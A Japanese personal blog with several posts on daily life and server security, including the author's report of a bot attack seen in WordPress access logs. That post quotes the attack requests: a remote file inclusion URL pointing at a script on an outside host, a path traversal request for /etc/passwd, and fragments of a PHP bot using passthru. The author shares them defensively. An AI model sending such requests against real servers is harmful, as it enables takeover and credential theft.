カテゴリー
everyday life

梅の実(今日の落下分)

福岡管区気象台は,今日,今年の梅雨入りを発表した。
麦畑の刈り取りもほぼ完了し,今日は旧暦の5月1日というわけで,その日に五月雨(さみだれ)開始なんて,「なんて間がいいんでしょ」,今年は。(笑)

写真は我が家の梅の木から落下した実,本日分のみネ。ふるーいバケツが風流?
で,横はその実を漬けた自家製の梅干し,もちろん,去年のです。これが,うまいんです。赤紫蘇を絞って,紫飯とか,一緒につけた生姜(紅ショウガ,でも実のところ紫といった方がいい色。)なんぞもいいです。

ところで,間が悪いのが,bot。
一昨日,StatPress Reloadedのログを見ていたら不審なユーザエージェントがありましてね。
<?php$Alertbotphp=(“で始まって,{passthru($cmd);} } ?>で終わるんですが,どうやら,PHPのRFIに関する脆弱性をついて,サーバをNetBot化しようというスクリプトのようです。

StatPress Reloadedのログをエクスポートして改めて見たら,
option=com_myblog&task=http://www.tourgaja.net/www/data/casper.txt?
option=com_myblog&task=../../../../../../../../../../../../../../../etc/passwd%00 に続いて,スクリプトを送っているようです。
こんな表題付きでした。

####################################################
##[                                              ]##
##[              casper_kae@yahoo.com            ]##
##[           Created by Kiss_Me or Alert        ]##
##[                 Thanks to mama               ]##
##[           Casper_Cell Parijatah srono        ]##
##[                                              ]##
####################################################

http://ja.forums.wordpress.org/topic/4241 で相談したら,サーバ管理者に連絡した方がいいだろうということだったので,昨日ToyParkにメールして,今のところ,回答待ちなんだけど,その後,ググってみたらこんなのがあった。
http://botnetzprovider.de/cnc1.html (魚拓です)
国内の報告はほとんどないようだけど,このブログは本家のせいで国外からのアクセスも結構あるようだから,そのせいかもしれない。

http://todos.xsrv.jp/2patioweb/todos.cgi?mode=view2&f=10&no=110
にも書いたんだけど,PHPのRFIの脆弱性狙いって,結構あるみたいですよね。サーバ管理者は気をつけないとね。

カテゴリー
WordPress

wp-config.phpについて。

セキュリティホール memoさんによれば,Network SolutionsにホスティングしているWordPressBLOGがらみで大規模なハッキングがあったらしい。

まぁ,こちらと関係が生じるかどうかはわからないけれど,前から気になっていたwp-config.phpの

/** MySQL のユーザー名 */
define(‘DB_USER’, ‘hogehoge’);
/** MySQL のパスワード */
define(‘DB_PASSWORD’, ‘passpass’);

関係のことだったので,wp-config.phpのパーミッションということでググッてみた。

こんなのがありました。
wp-config.phpのパーミッションは何にしておくのがベストでしょうか?
なるほどなぁとうなずけるところがあったので,パーミッションを404に変えておきました。

というお話です。

MySQLのほうのお話はもちろんこれだけでは解決にはなりませんが……

追記:4/17(土)
ToyParkのサーバはSuExecで動いているはずなので,大丈夫ということなのかな?
Secure File Permissions Matter

カテゴリー
Vulnerability

MS10-018 – 緊急。

先日来,私も気にしていましたマイクロソフト セキュリティ アドバイザリ 981374関連のパッチが,緊急で出ましたね。KB980182というやつですが,マイクロソフト セキュリティ情報 MS10-018 – 緊急というところを読んでみると,ほかにもいろいろ含まれているようで,自動更新にしていない場合は,手動ですぐに当てたほうがいいように思えます。

Java SE 6 も19にアップデートされたようだし,ウイルスバスターの新VSAPIも近々リリースされそうです。

こう引き続くと,ユーザの方もうんざりですが,昨今の状況ではアップデートをサボるわけには行かないし,ましてやメーカやベンダの方たちは大変なことでしょう。

「エールを送りますのでがんばってください。」 <————-って,こんな零細なブロガーに言われてもなぁ。(笑)

カテゴリー
Vulnerability

本家のお世話。

昨日,本家のサーバのApacheをアップデートしました。apache_2.2.14 から 2.2.15 へ。直前のこの記事 (Apache HTTP Server Vulnerability Advisory for Adobe Flash Media Server Customers) のせいね。

ついでに,久しぶりに翻訳文もアップした。こちらにドップリだったので,本家の翻訳はほぼひと月ほったらかし。これでまた,しばらく放っておいてもいいかな。

カテゴリー
Vulnerability

Apache HTTP Server Vulnerability.

今日は,Apacheの脆弱性です。Apache HTTP Server Vulnerability Advisory for Adobe Flash Media Server Customers
まぁ,脆弱性なんてどれにだってあるんだけど,それを狙うマルウェアが増えに増えているのが問題だよね。

嫌な時代になったもんだと,古き良き時代へのノスタルジーに駆られます。
Apache 2.2.15 がリリースされてるから,早急に自宅サーバのお世話をしなくちゃね。パッチあての方がいいかなぁ。